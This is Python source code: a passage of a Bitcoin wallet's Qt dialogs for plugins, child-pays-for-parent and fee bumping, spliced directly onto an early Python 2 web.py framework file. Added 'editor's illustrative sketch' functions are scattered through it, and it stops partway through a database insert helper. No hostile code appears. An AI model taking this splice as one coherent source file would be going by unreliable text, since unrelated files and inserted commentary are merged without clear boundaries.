widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
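# --- Editor's note: illustrative sketch, not part of the original file. ---
# The cpfp() dialog above derives the suggested child fee from a target
# combined feerate via get_child_fee_from_total_feerate():
#     child_fee = fee_per_kb * total_size / 1000 - parent_fee
# Worked example with hypothetical numbers: a 300-byte combined size, a
# 500 sat parent fee and a 5000 sat/kB target give
#     5000 * 300 / 1000 - 500 = 1000 sat
# for the child, clamped to at most the child's output value (max_fee) and to
# at least 1 sat/byte of the combined size.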
web.py
#!/usr/bin/env python
"""web.py: makes web apps (http://webpy.org)"""
__version__ = "0.1381"
__revision__ = "$Rev: 72 $"
__license__ = "public domain"
__author__ = "Aaron Swartz <me@aaronsw.com>"
__contributors__ = "see http://webpy.org/changes"
from __future__ import generators
# long term todo:
# - new form system
# - new templating system
# - unit tests?
# todo:
# - get rid of upvars
# - break up into separate files
# - provide an option to use .write()
# - allow people to do $self.id from inside a reparam
# - add sqlite support
# - convert datetimes, floats in WebSafe
# - locks around memoize
# - fix memoize to use cacheify style techniques
# - merge curval query with the insert
# - figure out how to handle squid, etc. for web.ctx.ip
import os, os.path, sys, time, types, traceback, threading
import cgi, re, urllib, urlparse, Cookie, pprint
from threading import currentThread
from tokenize import tokenprog
iters = (list, tuple)
if hasattr(__builtins__, 'set') or (
hasattr(__builtins__, 'has_key') and __builtins__.has_key('set')):
iters += (set,)
try:
from sets import Set
iters += (Set,)
except ImportError:
pass
try:
import datetime, itertools
except ImportError:
pass
try:
from Cheetah.Compiler import Compiler
from Cheetah.Filters import Filter
_hasTemplating = True
except ImportError:
_hasTemplating = False
try:
from DBUtils.PooledDB import PooledDB
_hasPooling = True
except ImportError:
_hasPooling = False
# hack for compatibility with Python 2.3:
if not hasattr(traceback, 'format_exc'):
from cStringIO import StringIO
def format_exc(limit=None):
strbuf = StringIO()
traceback.print_exc(limit, strbuf)
return strbuf.getvalue()
traceback.format_exc = format_exc
## General Utilities
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
"""removes the string `remove` from the right of `text`"""
return _strips('r', text, remove)
def lstrips(text, remove):
"""removes the string `remove` from the left of `text`"""
return _strips('l', text, remove)
def strips(text, remove):
"""removes the string `remove` from the both sides of `text`"""
return rstrips(lstrips(text, remove), remove)
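# Editor's illustrative sketch (not part of web.py): how the *strips helpers behave.
def _example_strips_usage():
    assert lstrips('webpy', 'web') == 'py'      # removed from the left only
    assert rstrips('web.py', '.py') == 'web'    # removed from the right only
    assert strips('|stuff|', '|') == 'stuff'    # removed from both sides
    assert lstrips('webpy', 'py') == 'webpy'    # no match, text unchanged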
def autoassign(self, locals):
"""
Automatically assigns local variables to `self`.
Generally used in `__init__` methods, as in:
def __init__(self, foo, bar, baz=1): autoassign(self, locals())
"""
#locals = sys._getframe(1).f_locals
#self = locals['self']
for (key, value) in locals.iteritems():
if key == 'self':
continue
setattr(self, key, value)
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
instead of `obj['foo']`. Create one by doing `storage({'a':1})`.
"""
def __getattr__(self, key):
if self.has_key(key):
return self[key]
raise AttributeError, repr(key)
def __setattr__(self, key, value):
self[key] = value
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
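# Editor's illustrative sketch (not part of web.py): attribute-style access on Storage.
def _example_storage_usage():
    s = storage({'a': 1})
    assert s.a == 1          # same as s['a']
    s.b = 2                  # same as s['b'] = 2
    assert s['b'] == 2
    try:
        s.missing
    except AttributeError:
        pass                 # unknown keys raise AttributeError, not KeyError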
def storify(mapping, *requireds, **defaults):
"""
Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
`mapping` doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
Similarly, if the value has a `value` attribute, `storify` will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
"""
def getvalue(x):
if hasattr(x, 'value'):
return x.value
else:
return x
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
class Memoize:
"""
'Memoizes' a function, caching its return values for each input.
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args, **keywords):
key = (args, tuple(keywords.items()))
if key not in self.cache:
self.cache[key] = self.func(*args, **keywords)
return self.cache[key]
memoize = Memoize
re_compile = memoize(re.compile) #@@ threadsafe?
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
def __init__(self):
self.match = None
def __call__(self, match):
self.match = match
return ''
def re_subm(pat, repl, string):
"""Like re.sub, but returns the replacement _and_ the match object."""
compiled_pat = re_compile(pat)
proxy = _re_subm_proxy()
compiled_pat.sub(proxy.__call__, string)
return compiled_pat.sub(repl, string), proxy.match
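# Editor's illustrative sketch (not part of web.py): re_subm returns both the
# substituted string and the (last) match object.
def _example_re_subm_usage():
    text, match = re_subm(r'\d+', 'N', 'order 123 shipped')
    assert text == 'order N shipped'
    assert match.group() == '123'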
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
For example, `list(group([1,2,3,4], 2))` returns `[[1,2],[3,4]]`.
"""
if not hasattr(seq, 'next'):
seq = iter(seq)
while True:
yield [seq.next() for i in xrange(size)]
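# Editor's illustrative sketch (not part of web.py, Python 2 only): group() yields
# fixed-size chunks and stops at the first incomplete chunk.
def _example_group_usage():
    assert list(group([1, 2, 3, 4], 2)) == [[1, 2], [3, 4]]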
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
while 1:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
#todo: slices
if i < self.c:
raise IndexError, "already passed "+str(i)
try:
while i > self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError, str(i)
iterbetter = IterBetter
def dictreverse(mapping):
"""Takes a dictionary like `{1:2, 3:4}` and returns `{2:1, 4:3}`."""
return dict([(value, key) for (key, value) in mapping.iteritems()])
def dictfind(dictionary, element):
"""
Returns a key whose value in `dictionary` is `element`
or, if none exists, None.
"""
for (key, value) in dictionary.iteritems():
if element is value:
return key
def dictfindall(dictionary, element):
"""
Returns the keys whose values in `dictionary` are `element`
or, if none exists, [].
"""
res = []
for (key, value) in dictionary.iteritems():
if element is value:
res.append(key)
return res
def dictincr(dictionary, element):
"""
Increments `element` in `dictionary`,
setting it to one if it doesn't exist.
"""
dictionary.setdefault(element, 0)
dictionary[element] += 1
return dictionary[element]
def dictadd(dict_a, dict_b):
"""
Returns a dictionary consisting of the keys in `dict_a` and `dict_b`.
If they share a key, the value from `dict_b` is used.
"""
result = {}
result.update(dict_a)
result.update(dict_b)
return result
sumdicts = dictadd # deprecated
def listget(lst, ind, default=None):
"""Returns `lst[ind]` if it exists, `default` otherwise."""
if len(lst)-1 < ind:
return default
return lst[ind]
def intget(integer, default=None):
"""Returns `integer` as an int or `default` if it can't."""
try:
return int(integer)
except (TypeError, ValueError):
return default
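# Editor's illustrative sketch (not part of web.py): the small dict/list helpers above.
def _example_small_helpers_usage():
    assert dictreverse({1: 2, 3: 4}) == {2: 1, 4: 3}
    counts = {}
    dictincr(counts, 'hits')
    dictincr(counts, 'hits')
    assert counts['hits'] == 2
    assert dictadd({'a': 1}, {'a': 9, 'b': 2}) == {'a': 9, 'b': 2}
    assert listget([10, 20], 5, 'default') == 'default'
    assert intget('42') == 42
    assert intget('not a number', 0) == 0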
def datestr(then, now=None):
"""Converts a (UTC) datetime object to a nice string representation."""
def agohence(n, what, divisor=None):
if divisor: n = n // divisor
out = str(abs(n)) + ' ' + what # '2 day'
if abs(n) != 1: out += 's' # '2 days'
out += ' ' # '2 days '
if n < 0:
out += 'from now'
else:
out += 'ago'
return out # '2 days ago'
oneday = 24 * 60 * 60
if not now: now = datetime.datetime.utcnow()
delta = now - then
deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
deltadays = abs(deltaseconds) // oneday
if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
if deltadays:
if abs(deltadays) < 4:
return agohence(deltadays, 'day')
out = then.strftime('%B %e') # e.g. 'June 13'
if then.year != now.year or deltadays < 0:
out += ', %s' % then.year
return out
if int(deltaseconds):
if abs(deltaseconds) > (60 * 60):
return agohence(deltaseconds, 'hour', 60 * 60)
elif abs(deltaseconds) > 60:
return agohence(deltaseconds, 'minute', 60)
else:
return agohence(deltaseconds, 'second')
deltamicroseconds = delta.microseconds
if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
if abs(deltamicroseconds) > 1000:
return agohence(deltamicroseconds, 'millisecond', 1000)
return agohence(deltamicroseconds, 'microsecond')
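# Editor's illustrative sketch (not part of web.py): datestr relative formatting.
def _example_datestr_usage():
    now = datetime.datetime(2006, 6, 15, 12, 0, 0)
    assert datestr(now - datetime.timedelta(days=2), now) == '2 days ago'
    assert datestr(now - datetime.timedelta(minutes=5), now) == '5 minutes ago'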
def upvars(level=2):
"""Guido van Rossum doesn't want you to use this function."""
return dictadd(
sys._getframe(level).f_globals,
sys._getframe(level).f_locals)
class CaptureStdout:
"""
Captures everything func prints to stdout and returns it instead.
**WARNING:** Not threadsafe!
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **keywords):
from cStringIO import StringIO
# Not threadsafe!
out = StringIO()
oldstdout = sys.stdout
sys.stdout = out
try:
self.func(*args, **keywords)
finally:
sys.stdout = oldstdout
return out.getvalue()
capturestdout = CaptureStdout
class Profile:
"""
Profiles `func` and returns a tuple containing its output
and a string with human-readable profiling information.
"""
def __init__(self, func):
self.func = func
def __call__(self, *args): ##, **kw): kw unused
import hotshot, hotshot.stats, tempfile ##, time already imported
temp = tempfile.NamedTemporaryFile()
prof = hotshot.Profile(temp.name)
stime = time.time()
result = prof.runcall(self.func, *args)
stime = time.time() - stime
prof.close()
stats = hotshot.stats.load(temp.name)
stats.strip_dirs()
stats.sort_stats('time', 'calls')
x = '\n\ntook '+ str(stime) + ' seconds\n'
x += capturestdout(stats.print_stats)(40)
x += capturestdout(stats.print_callers)()
return result, x
profile = Profile
def tryall(context, prefix=None):
"""
Tries a series of functions and prints their results.
`context` is a dictionary mapping names to values;
the value will only be tried if it's callable.
For example, you might have a file `test/stuff.py`
with a series of functions testing various things in it.
At the bottom, have a line:
if __name__ == "__main__": tryall(globals())
Then you can run `python test/stuff.py` and get the results of
all the tests.
"""
context = context.copy() # vars() would update
results = {}
for (key, value) in context.iteritems():
if not hasattr(value, '__call__'):
continue
if prefix and not key.startswith(prefix):
continue
print key + ':',
try:
r = value()
dictincr(results, r)
print r
except:
print 'ERROR'
dictincr(results, 'ERROR')
print ' ' + '\n '.join(traceback.format_exc().split('\n'))
print '-'*40
print 'results:'
for (key, value) in results.iteritems():
print ' '*2, str(key)+':', value
class ThreadedDict:
"""
Takes a dictionary that maps threads to objects.
When a thread tries to get or set an attribute or item
of the threadeddict, it passes it on to the object
for that thread in dictionary.
"""
def __init__(self, dictionary):
self.__dict__['_ThreadedDict__d'] = dictionary
def __getattr__(self, attr):
return getattr(self.__d[currentThread()], attr)
def __getitem__(self, item):
return self.__d[currentThread()][item]
def __setattr__(self, attr, value):
if attr == '__doc__':
self.__dict__[attr] = value
else:
return setattr(self.__d[currentThread()], attr, value)
def __setitem__(self, item, value):
self.__d[currentThread()][item] = value
def __hash__(self):
return hash(self.__d[currentThread()])
threadeddict = ThreadedDict
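# Editor's illustrative sketch (not part of web.py): ThreadedDict proxies item and
# attribute access to the entry for the current thread.
def _example_threadeddict_usage():
    backing = {currentThread(): storage()}
    td = threadeddict(backing)
    td.user = 'alice'                  # stored on this thread's storage object
    td['count'] = 1
    assert backing[currentThread()].user == 'alice'
    assert backing[currentThread()]['count'] == 1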
## IP Utilities
def validipaddr(address):
"""returns True if `address` is a valid IPv4 address"""
try:
octets = address.split('.')
assert len(octets) == 4
for x in octets:
assert 0 <= int(x) <= 255
except (AssertionError, ValueError):
return False
return True
def validipport(port):
"""returns True if `port` is a valid IPv4 port"""
try:
assert 0 <= int(port) <= 65535
except (AssertionError, ValueError):
return False
return True
def validip(ip, defaultaddr="0.0.0.0", defaultport=8080):
"""returns `(ip_address, port)` from string `ip_addr_port`"""
addr = defaultaddr
port = defaultport
ip = ip.split(":", 1)
if len(ip) == 1:
if not ip[0]:
pass
elif validipaddr(ip[0]):
addr = ip[0]
elif validipport(ip[0]):
port = int(ip[0])
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
elif len(ip) == 2:
addr, port = ip
if not (validipaddr(addr) and validipport(port)):
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
port = int(port)
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
return (addr, port)
def validaddr(string_):
"""returns either (ip_address, port) or "/path/to/socket" from string_"""
if '/' in string_:
return string_
else:
return validip(string_)
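# Editor's illustrative sketch (not part of web.py): parsing "ip:port" strings.
def _example_validip_usage():
    assert validip('1.2.3.4:8080') == ('1.2.3.4', 8080)
    assert validip('1.2.3.4') == ('1.2.3.4', 8080)        # default port kept
    assert validip('9000') == ('0.0.0.0', 9000)           # bare port, default address
    assert validaddr('/tmp/app.sock') == '/tmp/app.sock'  # socket path passed through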
## URL Utilities
def prefixurl(base=''):
"""
Sorry, this function is really difficult to explain.
Maybe some other time.
"""
url = ctx.path.lstrip('/')
for i in xrange(url.count('/')):
base += '../'
if not base:
base = './'
return base
def urlquote(x): return urllib.quote(websafe(x).encode('utf-8'))
## Formatting
try:
from markdown import markdown # http://webpy.org/markdown.py
except ImportError:
pass
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
"""
Converts text to HTML following the rules of Markdown, but blocking any
outside HTML input, so that only the things supported by Markdown
can be used. Also converts raw URLs to links.
(requires [markdown.py](http://webpy.org/markdown.py))
"""
if text:
text = text.replace('<', '&lt;')
# TODO: automatically get page title?
text = r_url.sub(r'<\1>', text)
text = markdown(text)
return text
## Databases
class _ItplError(ValueError):
"""String Interpolation Error
from <http://lfw.org/python/Itpl.py>
(cf. below for license)
"""
def __init__(self, text, pos):
ValueError.__init__(self)
self.text = text
self.pos = pos
def __str__(self):
return "unfinished expression in %s at char %d" % (
repr(self.text), self.pos)
def _interpolate(format):
"""
Takes a format string and returns a list of 2-tuples of the form
(boolean, string) where boolean says whether string should be evaled
or not.
from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
"""
def matchorfail(text, pos):
match = tokenprog.match(text, pos)
if match is None:
raise _ItplError(text, pos)
return match, match.end()
namechars = "abcdefghijklmnopqrstuvwxyz" \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_";
chunks = []
pos = 0
while 1:
dollar = format.find("$", pos)
if dollar < 0:
break
nextchar = format[dollar + 1]
if nextchar == "{":
chunks.append((0, format[pos:dollar]))
pos, level = dollar + 2, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token == "{":
level = level + 1
elif token == "}":
level = level - 1
chunks.append((1, format[dollar + 2:pos - 1]))
elif nextchar in namechars:
chunks.append((0, format[pos:dollar]))
match, pos = matchorfail(format, dollar + 1)
while pos < len(format):
if format[pos] == "." and \
pos + 1 < len(format) and format[pos + 1] in namechars:
match, pos = matchorfail(format, pos + 1)
elif format[pos] in "([":
pos, level = pos + 1, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token[0] in "([":
level = level + 1
elif token[0] in ")]":
level = level - 1
else:
break
chunks.append((1, format[dollar + 1:pos]))
else:
chunks.append((0, format[pos:dollar + 1]))
pos = dollar + 1 + (nextchar == "$")
if pos < len(format):
chunks.append((0, format[pos:]))
return chunks
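# Editor's illustrative sketch (not part of web.py): _interpolate splits a
# "$name"-style format string into literal and to-be-evaluated chunks, which
# reparam() then turns into aparam() placeholders plus a list of values.
def _example_interpolate_usage():
    chunks = _interpolate('WHERE id = $id AND name = $name')
    assert chunks == [(0, 'WHERE id = '), (1, 'id'),
                      (0, ' AND name = '), (1, 'name')]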
def sqlors(left, lst):
"""
`left` is a SQL clause like `tablename.arg = `
and `lst` is a list of values. Returns a reparam-style
pair featuring the SQL that ORs together the clause
for each item in the lst.
For example:
web.sqlors('foo =', [1,2,3])
would result in:
foo = 1 OR foo = 2 OR foo = 3
"""
if isinstance(lst, iters):
lst = list(lst)
ln = len(lst)
if ln == 0:
return ("2+2=5", [])
if ln == 1:
lst = lst[0]
if isinstance(lst, iters):
return '(' + left + \
(' OR ' + left).join([aparam() for param in lst]) + ")", lst
else:
return left + aparam(), [lst]
class UnknownParamstyle(Exception):
"""raised for unsupported db paramstyles
Currently supported: qmark, numeric, format, pyformat
"""
pass
def aparam():
"""Use in a SQL string to make a spot for a db value."""
style = ctx.db_module.paramstyle
if style == 'qmark':
return '?'
elif style == 'numeric':
return ':1'
elif style in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle, style
def reparam(string_, dictionary):
"""
Takes a string and a dictionary and interpolates the string
using values from the dictionary. Returns a 2-tuple containing
a string with `aparam()`s in it and a list of the matching values.
You can pass this sort of thing as a clause in any db function.
Otherwise, you can pass a dictionary to the keyword argument `vars`
and the function will call reparam for you.
"""
vals = []
result = []
for live, chunk in _interpolate(string_):
if live:
result.append(aparam())
vals.append(eval(chunk, dictionary))
else: result.append(chunk)
return ''.join(result), vals
class UnknownDB(Exception):
"""raised for unsupported dbms"""
pass
def connect(dbn, **keywords):
"""
Connects to the specified database.
db currently must be "postgres" or "mysql".
If DBUtils is installed, connection pooling will be used.
"""
if dbn == "postgres":
try:
import psycopg2 as db
except ImportError:
try:
import psycopg as db
except ImportError:
import pgdb as db
keywords['password'] = keywords['pw']
del keywords['pw']
keywords['database'] = keywords['db']
del keywords['db']
elif dbn == "mysql":
import MySQLdb as db
keywords['passwd'] = keywords['pw']
del keywords['pw']
db.paramstyle = 'pyformat' # it's both, like psycopg
elif dbn == "sqlite":
try: ## try first sqlite3 version
from pysqlite2 import dbapi2 as db
db.paramstyle = 'qmark'
except ImportError: ## else try sqlite2
import sqlite as db
keywords['database'] = keywords['db']
del keywords['db']
else:
raise UnknownDB, dbn
ctx.db_name = dbn
ctx.db_module = db
ctx.db_transaction = False
if _hasPooling:
if 'db' not in globals():
globals()['db'] = PooledDB(dbapi=db, **keywords)
ctx.db = globals()['db'].connection()
else:
ctx.db = db.connect(**keywords)
ctx.dbq_count = 0
if globals().get('db_printing'):
def db_execute(cur, sql_query, d=None):
"""executes an sql query"""
def sqlquote(obj):
"""converts `obj` to its proper SQL version"""
# because `1 == True and hash(1) == hash(True)`
# we have to do this the hard way...
if obj is None:
return 'NULL'
elif obj is True:
return "'t'"
elif obj is False:
return "'f'"
elif isinstance(obj, datetime.datetime):
return repr(obj.isoformat())
else:
return repr(obj)
ctx.dbq_count += 1
try:
outq = sql_query % tuple(map(sqlquote, d))
except TypeError:
outq = sql_query
print >> debug, str(ctx.dbq_count)+':', outq
a = time.time()
out = cur.execute(sql_query, d)
b = time.time()
print >> debug, '(%s)' % round(b - a, 2)
return out
ctx.db_execute = db_execute
else:
ctx.db_execute = lambda cur, sql_query, d=None: \
cur.execute(sql_query, d)
return ctx.db
def transact():
"""Start a transaction."""
# commit everything up to now, so we don't rollback it later
ctx.db.commit()
ctx.db_transaction = True
def commit():
"""Commits a transaction."""
ctx.db.commit()
ctx.db_transaction = False
def rollback():
"""Rolls back a transaction."""
ctx.db.rollback()
ctx.db_transaction = False
def query(sql_query, vars=None, processed=False):
"""
Execute SQL query `sql_query` using dictionary `vars` to interpolate it.
If `processed=True`, `vars` is a `reparam`-style list to use
instead of interpolating.
"""
if vars is None:
vars = {}
db_cursor = ctx.db.cursor()
if not processed:
sql_query, vars = reparam(sql_query, vars)
ctx.db_execute(db_cursor, sql_query, vars)
if db_cursor.description:
names = [x[0] for x in db_cursor.description]
def iterwrapper():
row = db_cursor.fetchone()
while row:
yield Storage(dict(zip(names, row)))
row = db_cursor.fetchone()
out = iterbetter(iterwrapper())
out.__len__ = lambda: int(db_cursor.rowcount)
out.list = lambda: [Storage(dict(zip(names, x))) \
for x in db_cursor.fetchall()]
else:
out = db_cursor.rowcount
if not ctx.db_transaction:
ctx.db.commit()
return out
def sqllist(lst):
"""
If a list, converts it to a comma-separated string.
Otherwise, returns the string.
"""
if isinstance(lst, str):
return lst
else: return ', '.join(lst)
def sqlwhere(dictionary):
"""
Converts a `dictionary` to an SQL WHERE clause in
`reparam` format. Thus,
{'cust_id': 2, 'order_id':3}
would result in the equivalent of:
'cust_id = 2 AND order_id = 3'
but properly quoted.
"""
return ' AND '.join([
'%s = %s' % (k, aparam()) for k in dictionary.keys()
]), dictionary.values()
def select(tables, vars=None, what='*', where=None, order=None, group=None,
limit=None, offset=None):
"""
Selects `what` from `tables` with clauses `where`, `order`,
`group`, `limit`, and `offset`. Uses `vars` to interpolate.
Otherwise, each clause can take a reparam-style list.
"""
if vars is None:
vars = {}
values = []
qout = ""
for (sql, val) in (
('SELECT', what),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order),
('LIMIT', limit),
('OFFSET', offset)):
if isinstance(val, (int, long)):
if sql == 'WHERE':
nquery, nvalue = 'id = '+aparam(), [val]
else:
nquery, nvalue = str(val), ()
elif isinstance(val, (list, tuple)) and len(val) == 2:
nquery, nvalue = val
elif val:
nquery, nvalue = reparam(val, vars)
else:
continue
qout += " " + sql + " " + nquery
values.extend(nvalue)
return query(qout, values, processed=True)
def insert(tablename, seqname=None, **values):
"""
Inserts `values` into `tablename`. Returns current sequence ID.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
"""
db_cursor = ctx.db.cursor()
if values:
sql_query, v = "INSERT INTO %s (%s) VALUES (%s)" % (
tablename,
", ".join(values.keys()),
', '.join([aparam() for x in values])
), values.values()
else:
sql_query, v = "INSERT INTO %s DEFAULT VALUES" % tablename, None
if seqname is False:
pass
elif ctx.db_name == "postgres":
if seqname is None:
seqname = tablename + "_id_seq"
sql_query += "; SELECT currval('%s')" % seqname
